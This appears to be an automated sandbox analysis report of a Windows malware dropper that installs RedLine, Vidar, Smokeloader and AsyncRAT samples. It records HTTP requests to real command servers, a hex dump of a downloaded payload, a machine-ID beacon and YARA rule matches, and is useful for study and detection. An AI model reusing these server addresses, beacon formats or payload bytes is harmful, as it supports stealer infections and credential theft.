Source: global traffic	HTTP traffic detected: GET /aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/msvcp140.dll HTTP/1.1Content-Type: text/plain;User-Agent: qwrqrwrqwrqwrHost: 45.95.11.158Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/vcruntime140.dll HTTP/1.1Content-Type: text/plain;User-Agent: qwrqrwrqwrqwrHost: 45.95.11.158Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/mozglue.dll HTTP/1.1Content-Type: text/plain;User-Agent: qwrqrwrqwrqwrHost: 45.95.11.158Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/freebl3.dll HTTP/1.1Content-Type: text/plain;User-Agent: qwrqrwrqwrqwrHost: 45.95.11.158Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/softokn3.dll HTTP/1.1Content-Type: text/plain;User-Agent: qwrqrwrqwrqwrHost: 45.95.11.158Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/sqlite3.dll HTTP/1.1Content-Type: text/plain;User-Agent: qwrqrwrqwrqwrHost: 45.95.11.158Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /1571 HTTP/1.1Host: 135.181.104.248
Source: global traffic	HTTP traffic detected: GET /0586872789.zip HTTP/1.1Host: 135.181.104.248Cache-Control: no-cache

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49861
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49783
Source: unknown	Network traffic detected: HTTP traffic on port 49727 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49875 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49803 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49776 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49810 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown	Network traffic detected: HTTP traffic on port 49849 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49753 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49777
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49810
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49776
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49728 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49763 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49794 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50072
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49729
Source: unknown	Network traffic detected: HTTP traffic on port 49752 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49728
Source: unknown	Network traffic detected: HTTP traffic on port 49777 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49848 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49849
Source: unknown	Network traffic detected: HTTP traffic on port 49861 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49727
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49848
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49726
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49803
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49768
Source: unknown	Network traffic detected: HTTP traffic on port 49790 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49739 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49765
Source: unknown	Network traffic detected: HTTP traffic on port 49783 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49763
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49884
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50076
Source: unknown	Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49729 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50076 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49797 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50041
Source: unknown	Network traffic detected: HTTP traffic on port 49755 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49755
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49754
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49875
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49753
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49797
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49752
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50041 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49794
Source: unknown	Network traffic detected: HTTP traffic on port 49726 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49790
Source: unknown	Network traffic detected: HTTP traffic on port 49765 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49744 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49768 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50072 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49884 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49754 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49745

Source: global traffic

HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Tue, 23 Aug 2022 01:43:00 GMTContent-Type: application/zipContent-Length: 3642574Last-Modified: Mon, 04 Jul 2022 10:49:28 GMTConnection: keep-aliveETag: "62c2c5b8-3794ce"Accept-Ranges: bytesData Raw: 50 4b 03 04 14 00 00 00 08 00 10 6e 55 53 4b 12 b5 9b fc b5 00 00 48 47 01 00 10 00 1c 00 76 63 72 75 6e 74 69 6d 65 31 34 30 2e 64 6c 6c 55 54 09 00 03 b0 6f 71 61 b0 6f 71 61 75 78 0b 00 01 04 00 00 00 00 04 00 00 00 00 ec fd 0b 40 54 d5 bb 38 0c ef 61 06 18 71 60 46 05 45 45 1d 15 6f e1 65 98 e1 3e c3 55 06 f1 82 0e 22 e0 0d 11 b9 38 20 02 c1 1e d4 14 45 07 ca 71 37 e5 af ac ac ac 34 ad 9f 95 95 95 99 99 19 88 09 98 29 5e 32 4b 2b 34 aa 4d 43 8a 4a 80 4a ce f7 3c 6b ef 81 01 c5 73 ce ff 7d cf 7b be f7 fb 0e ba f6 65 5d 9e f5 ac 67 3d b7 b5 f6 5a 6b e2 16 6e a5 84 14 45 89 20 58 ad 14 75 88 e2 fe 22 a8 ff f8 af 19 82 db 88 c3 6e d4 81 3e df 8e 3c 24 98 f5 ed c8 79 fa ec 22 79 41 61 fe f2 c2 b4 95 f2 f4 b4 bc bc 7c 5a be 2c 53 5e 68 c8 93 67 e7 c9 a3 e7 24 c8 57 e6 67 64 4e 76 75 75 f1 e6 61 08 ee ec 9e ad dd fe ed 30 5b b8 29 1a 35 6c 1a dc 67 d5 2f 19 36 9b c4 9d 1a 96 0b f7 1d 77 6b bd 12 c9 fd b4 57 12 b9 d7 78 45 92 fb d7 5e a9 e4 fe ad 57 34 b9 2b 87 71 f7 33 e4 7d 6e 76 ba 1e e1 da 70 d6 69 29 6a 96 c0 91 92 04 8d 5b 60 8b ab a7 46 8d ec 2b 70 eb 4b fd 09 2f 72 3e f2 03 08 32 82 21 45 9e f0 d9 81 a2 9c e0 e6 42 71 77 8e 50 02 42 bc 23 fd 1c 80 8e 11 91 a4 90 8c 2b c2 dd b9 db 7e 20 96 7b 1f 8a aa 90 09 a8 a7 31 52 2e a0 c4 22 3b 62 8a 05 54 6c 38 dc 15 02 6a 1b 54 b0 7f 04 45 05 3d 82 f6 ec 88 1e 7d 04 70 8f 3c 22 ff 64 3a 73 35 0d f7 e3 8d 3c 42 d8 56 51 f7 3c d0 f4 a5 93 33 d2 e8 34 78 8e 76 e2 db 0e 6d a6 ae 77 cf 07 f5 56 4c ce e6 32 1e 72 e4 ea 26 04 69 7e 20 5f c4 e4 c2 a2 c2 74 6c 9e 88 6b 33 c9 d7 fa b0 7c 99 b9 f9 90 11 db 8e 34 a0 24 70 ef 78 20 5f d4 23 9a f8 bf 7f ff 07 7f 05 63 e1 52 07 17 41 33 3e 6d 1d 07 97 88 f1 18 f7 18 26 fb 40 d0 e1 65 2b 5e 76 e2 65 3f 5e 2a f0 52 87 17 f9 44 b8 28 f0 12 81 97 7a bc c8 26 61 2a 5e a8 c9 f8 8a 97 a5 78 69 56 62 09 3f 4c 40 e6 56 04 23 bc 10 7c d5 e0 13 5e a8 50 2c 11 86 25 f0 52 81 97 7a bc 50 28 1d a5 78 59 1a 81 88 47 63 02 5e 28 2d 56 8e 97 02 f2 14 83 38 e3 65 29 5e b6 e2 85 9a 86 f5 e2 25 02 2f 4b f1 a2 98 8e f0 66 22 a6 78 69 c6 0b 35 0b f3 e1 25 02 2f a5 e4 35 0e d1 c0 4b c1 3b 18 87 97 ad 78 d9 8f 97 0a f2 f4 2e e6 7b 0f 81 e2 25 02 2f 4b f1 52 40 5e f7 61 09 bc d4 e1 85 68 96 f1 70 11 b4 e3 45 b4 1f 2e 8a fd 08 0a 2f e2 8f b0 ec c7 48 6c bc c8 3f 41 a0 78 89 c7 cb 8b 78 a1 3e 85 12 05 07 91 4c 5f 20 0d ea 10 fc 59 7c fd 1e 9f ae 60 63 7e c2 b2 bf 20 a8 7a c4 e0 37 c4 05 2f 4b 7f 87 b2 3b f1 52 f7 3b 26 b0 08 0a 55 81 ce 82 55 5a 1e e0 0f d4 7e a5 72 4a 06 99 64 0a 07 81 ac 14 02 c5 75 b6 6c af 3b 25 6b 80 20 f7 a0 64 b2 a1 94 cc 1b 42 04 84 79 10 68 08 fb 20 fe 10 84 0a 08 a7 20 5c 82 d0 00 a1 19 02 35 90 92 49 20 b8 43 f0 82 30 1e 82 1f 84 b0 81 9c d6 8c 80 7b 2c 04 1d 84 79 10 e6 43 58 0c 61 29 84 0c 08 7a 08 b9 10 56 43 58 07

Source: unknown	TCP traffic detected without corresponding DNS query: 45.95.11.158
Source: unknown	TCP traffic detected without corresponding DNS query: 45.95.11.158
Source: unknown	TCP traffic detected without corresponding DNS query: 45.95.11.158
Source: unknown	TCP traffic detected without corresponding DNS query: 45.95.11.158
Source: unknown	TCP traffic detected without corresponding DNS query: 45.95.11.158
Source: unknown	TCP traffic detected without corresponding DNS query: 45.95.11.158
Source: unknown	TCP traffic detected without corresponding DNS query: 45.95.11.158
Source: unknown	TCP traffic detected without corresponding DNS query: 45.95.11.158
Source: unknown	TCP traffic detected without corresponding DNS query: 45.95.11.158
Source: unknown	TCP traffic detected without corresponding DNS query: 45.95.11.158
Source: unknown	TCP traffic detected without corresponding DNS query: 45.95.11.158
Source: unknown	TCP traffic detected without corresponding DNS query: 45.95.11.158
Source: unknown	TCP traffic detected without corresponding DNS query: 45.95.11.158
Source: unknown	TCP traffic detected without corresponding DNS query: 45.95.11.158
Source: unknown	TCP traffic detected without corresponding DNS query: 45.95.11.158
Source: unknown	TCP traffic detected without corresponding DNS query: 45.95.11.158
Source: unknown	TCP traffic detected without corresponding DNS query: 45.95.11.158
Source: unknown	TCP traffic detected without corresponding DNS query: 45.95.11.158
Source: unknown	TCP traffic detected without corresponding DNS query: 45.95.11.158
Source: unknown	TCP traffic detected without corresponding DNS query: 45.95.11.158
Source: unknown	TCP traffic detected without corresponding DNS query: 45.95.11.158
Source: unknown	TCP traffic detected without corresponding DNS query: 45.95.11.158
Source: unknown	TCP traffic detected without corresponding DNS query: 45.95.11.158
Source: unknown	TCP traffic detected without corresponding DNS query: 45.95.11.158
Source: unknown	TCP traffic detected without corresponding DNS query: 45.95.11.158
Source: unknown	TCP traffic detected without corresponding DNS query: 45.95.11.158
Source: unknown	TCP traffic detected without corresponding DNS query: 45.95.11.158
Source: unknown	TCP traffic detected without corresponding DNS query: 45.95.11.158
Source: unknown	TCP traffic detected without corresponding DNS query: 45.95.11.158
Source: unknown	TCP traffic detected without corresponding DNS query: 45.95.11.158
Source: unknown	TCP traffic detected without corresponding DNS query: 45.95.11.158
Source: unknown	TCP traffic detected without corresponding DNS query: 45.95.11.158
Source: unknown	TCP traffic detected without corresponding DNS query: 45.95.11.158
Source: unknown	TCP traffic detected without corresponding DNS query: 45.95.11.158
Source: unknown	TCP traffic detected without corresponding DNS query: 45.95.11.158
Source: unknown	TCP traffic detected without corresponding DNS query: 45.95.11.158
Source: unknown	TCP traffic detected without corresponding DNS query: 45.95.11.158
Source: unknown	TCP traffic detected without corresponding DNS query: 45.95.11.158
Source: unknown	TCP traffic detected without corresponding DNS query: 45.95.11.158
Source: unknown	TCP traffic detected without corresponding DNS query: 45.95.11.158
Source: unknown	TCP traffic detected without corresponding DNS query: 45.95.11.158
Source: unknown	TCP traffic detected without corresponding DNS query: 45.95.11.158
Source: unknown	TCP traffic detected without corresponding DNS query: 45.95.11.158
Source: unknown	TCP traffic detected without corresponding DNS query: 45.95.11.158
Source: unknown	TCP traffic detected without corresponding DNS query: 45.95.11.158
Source: unknown	TCP traffic detected without corresponding DNS query: 45.95.11.158
Source: unknown	TCP traffic detected without corresponding DNS query: 45.95.11.158
Source: unknown	TCP traffic detected without corresponding DNS query: 45.95.11.158
Source: unknown	TCP traffic detected without corresponding DNS query: 45.95.11.158
Source: unknown	TCP traffic detected without corresponding DNS query: 45.95.11.158

Source: unknown

HTTP traffic detected: POST / HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencoded; charset=utf-8User-Agent: mozzzzzzzzzzzHost: 45.95.11.158Content-Length: 94Connection: Keep-AliveCache-Control: no-cacheData Raw: 6d 61 63 68 69 6e 65 49 64 3d 64 30 36 65 64 36 33 35 2d 36 38 66 36 2d 34 65 39 61 2d 39 35 35 63 2d 34 38 39 39 66 35 66 35 37 62 39 61 7c 68 61 72 64 7a 26 63 6f 6e 66 69 67 49 64 3d 37 36 34 32 36 63 33 66 33 36 32 66 35 61 34 37 61 34 36 39 66 30 65 39 64 38 62 63 33 65 65 66 Data Ascii: machineId=d06ed635-68f6-4e9a-955c-4899f5f57b9a|user&configId=76426c3f362f5a47a469f0e9d8bc3eef

Source: unknown	HTTPS traffic detected: 148.251.234.83:443 -> 192.168.2.3:49741 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.3:49810 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.22.1.232:443 -> 192.168.2.3:49875 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.159.133.233:443 -> 192.168.2.3:49884 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.22.1.232:443 -> 192.168.2.3:50072 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.159.133.233:443 -> 192.168.2.3:50076 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Yara detected AsyncRAT

Source: Yara match

File source: Process Memory Space: SETUP_~1.EXE PID: 7812, type: MEMORYSTR

Source: kukurzka9000.exe, 00000017.00000002.367634106.00000000006AA000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

System Summary

Malicious sample detected (through community Yara rule)

Source: 26.0.namdoitntn.exe.2f0000.0.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 26.0.namdoitntn.exe.2f0000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_RedLineStealer_3d9371fd Author: unknown
Source: 36.0.ffnameedit.exe.140000.0.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 36.0.ffnameedit.exe.140000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_RedLineStealer_3d9371fd Author: unknown
Source: 31.0.jshainx.exe.3e0000.0.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 31.0.jshainx.exe.3e0000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_RedLineStealer_3d9371fd Author: unknown
Source: 1.3.WSkT8d093C.exe.3af5a14.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Vidar_114258d5 Author: unknown
Source: 33.2.brokerius.exe.ce0000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Vidar_114258d5 Author: unknown
Source: 1.3.WSkT8d093C.exe.3adae14.1.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 1.3.WSkT8d093C.exe.3adae14.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_RedLineStealer_3d9371fd Author: unknown
Source: 33.0.brokerius.exe.ce0000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Vidar_114258d5 Author: unknown
Source: 37.2.WW1.exe.12a0000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Vidar_114258d5 Author: unknown
Source: 30.0.safert44.exe.c90000.0.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 30.0.safert44.exe.c90000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_RedLineStealer_3d9371fd Author: unknown
Source: 29.0.real.exe.fc0000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Vidar_114258d5 Author: unknown
Source: 29.2.real.exe.fc0000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Vidar_114258d5 Author: unknown
Source: 37.0.WW1.exe.12a0000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Vidar_114258d5 Author: unknown
Source: 1.3.WSkT8d093C.exe.3af5a14.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Vidar_114258d5 Author: unknown
Source: 1.3.WSkT8d093C.exe.3adae14.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 1.3.WSkT8d093C.exe.3adae14.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_RedLineStealer_3d9371fd Author: unknown
Source: 1.3.WSkT8d093C.exe.3adae14.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Vidar_114258d5 Author: unknown
Source: 00000014.00000002.443247307.00000000004E8000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 0000001A.00000000.343257573.00000000002F2000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_3d9371fd Author: unknown
Source: 0000001F.00000000.356865696.00000000003F3000.00000002.00000001.01000000.0000000E.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_3d9371fd Author: unknown
Source: 00000001.00000003.272716591.0000000003A60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_3d9371fd Author: unknown
Source: 00000001.00000003.272716591.0000000003A60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Vidar_114258d5 Author: unknown
Source: 00000021.00000002.795622343.0000000000D14000.00000002.00000001.01000000.0000000F.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Vidar_114258d5 Author: unknown
Source: 0000001D.00000000.347251788.0000000000FF3000.00000002.00000001.01000000.0000000C.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Vidar_114258d5 Author: unknown
Source: 0000001E.00000000.351377883.0000000000C92000.00000002.00000001.01000000.0000000D.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_3d9371fd Author: unknown
Source: 00000024.00000000.371239903.0000000000153000.00000002.00000001.01000000.00000014.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_3d9371fd Author: unknown
Source: 0000001D.00000002.795454230.0000000000FF3000.00000002.00000001.01000000.0000000C.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Vidar_114258d5 Author: unknown
Source: 00000025.00000000.377440161.00000000012D3000.00000002.00000001.01000000.00000015.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Vidar_114258d5 Author: unknown
Source: 00000014.00000002.442092105.00000000004C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000025.00000002.792118576.00000000012D3000.00000002.00000001.01000000.00000015.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Vidar_114258d5 Author: unknown
Source: 00000021.00000000.360138360.0000000000D14000.00000002.00000001.01000000.0000000F.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Vidar_114258d5 Author: unknown
Source: Process Memory Space: real.exe PID: 8952, type: MEMORYSTR	Matched rule: Windows_Trojan_Vidar_114258d5 Author: unknown
Source: Process Memory Space: brokerius.exe PID: 4472, type: MEMORYSTR	Matched rule: Windows_Trojan_Vidar_114258d5 Author: unknown
Source: Process Memory Space: WW1.exe PID: 6840, type: MEMORYSTR	Matched rule: Windows_Trojan_Vidar_114258d5 Author: unknown
Source: C:\Program Files (x86)\Company\NewProduct\safert44.exe, type: DROPPED	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: C:\Program Files (x86)\Company\NewProduct\safert44.exe, type: DROPPED	Matched rule: Windows_Trojan_RedLineStealer_3d9371fd Author: unknown
Source: C:\Program Files (x86)\Company\NewProduct\WW1.exe, type: DROPPED	Matched rule: Windows_Trojan_Vidar_114258d5 Author: unknown
Source: C:\Program Files (x86)\Company\NewProduct\brokerius.exe, type: DROPPED	Matched rule: Windows_Trojan_Vidar_114258d5 Author: unknown
Source: C:\Program Files (x86)\Company\NewProduct\ffnameedit.exe, type: DROPPED	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: C:\Program Files (x86)\Company\NewProduct\ffnameedit.exe, type: DROPPED	Matched rule: Windows_Trojan_RedLineStealer_3d9371fd Author: unknown
Source: C:\Program Files (x86)\Company\NewProduct\jshainx.exe, type: DROPPED	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: C:\Program Files (x86)\Company\NewProduct\jshainx.exe, type: DROPPED	Matched rule: Windows_Trojan_RedLineStealer_3d9371fd Author: unknown
Source: C:\Program Files (x86)\Company\NewProduct\real.exe, type: DROPPED	Matched rule: Windows_Trojan_Vidar_114258d5 Author: unknown

Source: C:\Program Files (x86)\Company\NewProduct\F0geI.exe	Code function: 20_2_00426000		20_2_00426000
Source: C:\Program Files (x86)\Company\NewProduct\F0geI.exe	Code function: 20_2_00425220		20_2_00425220

Source: WSkT8d093C.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: WSkT8d093C.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: captain09876.exe.1.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: captain09876.exe.1.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: captain09876.exe.1.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: ordo_sec666.exe.1.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: ordo_sec666.exe.1.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: ordo_sec666.exe.1.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: F0geI.exe.1.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: F0geI.exe.1.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: F0geI.exe.1.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: F0geI.exe.1.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: F0geI.exe.1.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: F0geI.exe.1.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: F0geI.exe.1.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: F0geI.exe.1.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: kukurzka9000.exe.1.dr	Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: DllResource.exe.35.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: DllResource.exe.35.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: DllResource.exe.35.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Source: sqlite3.dll.20.dr

Static PE information: Number of sections : 18 > 10

Source: WSkT8d093C.exe

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI

Source: 26.0.namdoitntn.exe.2f0000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 26.0.namdoitntn.exe.2f0000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_RedLineStealer_3d9371fd reference_sample = 0ec522dfd9307772bf8b600a8b91fd6facd0bf4090c2b386afd20e955b25206a, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 2d7ff7894b267ba37a2d376b022bae45c4948ef3a70b1af986e7492949b5ae23, id = 3d9371fd-c094-40fc-baf8-f0e9e9a54ff9, last_modified = 2022-04-12
Source: 36.0.ffnameedit.exe.140000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 36.0.ffnameedit.exe.140000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_RedLineStealer_3d9371fd reference_sample = 0ec522dfd9307772bf8b600a8b91fd6facd0bf4090c2b386afd20e955b25206a, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 2d7ff7894b267ba37a2d376b022bae45c4948ef3a70b1af986e7492949b5ae23, id = 3d9371fd-c094-40fc-baf8-f0e9e9a54ff9, last_modified = 2022-04-12
Source: 31.0.jshainx.exe.3e0000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 31.0.jshainx.exe.3e0000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_RedLineStealer_3d9371fd reference_sample = 0ec522dfd9307772bf8b600a8b91fd6facd0bf4090c2b386afd20e955b25206a, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 2d7ff7894b267ba37a2d376b022bae45c4948ef3a70b1af986e7492949b5ae23, id = 3d9371fd-c094-40fc-baf8-f0e9e9a54ff9, last_modified = 2022-04-12
Source: 1.3.WSkT8d093C.exe.3af5a14.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Vidar_114258d5 reference_sample = 34c0cb6eaf2171d3ab9934fe3f962e4e5f5e8528c325abfe464d3c02e5f939ec, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Vidar, fingerprint = 9b4f7619e15398fcafc622af821907e4cf52964c55f6a447327738af26769934, id = 114258d5-f05e-46ac-914b-1a7f338ccf58, last_modified = 2021-08-23
Source: 33.2.brokerius.exe.ce0000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Vidar_114258d5 reference_sample = 34c0cb6eaf2171d3ab9934fe3f962e4e5f5e8528c325abfe464d3c02e5f939ec, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Vidar, fingerprint = 9b4f7619e15398fcafc622af821907e4cf52964c55f6a447327738af26769934, id = 114258d5-f05e-46ac-914b-1a7f338ccf58, last_modified = 2021-08-23
